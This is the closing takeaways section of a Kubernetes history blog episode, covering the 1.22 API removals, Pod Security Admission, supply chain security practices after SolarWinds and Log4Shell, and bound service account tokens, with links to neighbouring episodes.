  • The API removals in 1.22 were operationally painful but necessary — beta APIs in Kubernetes are not production-stable commitments
  • Pod Security Admission (PSP’s replacement) trades power for reliability — three fixed profiles enforced at the namespace level, built into the API server, no authorization edge cases
  • SolarWinds and Log4Shell made supply chain security a board-level concern; Sigstore, SBOM, and admission-time image verification moved from “nice to have” to operational requirements
  • Bound service account tokens (1.22 stable) addressed a persistent security gap: pod tokens that expire and are audience-restricted rather than long-lived cluster-wide credentials

What’s Next

← EP04: The Operator Era | EP06: The Runtime Reckoning →

Series: Kubernetes: From Borg to Platform Engineering | linuxcent.com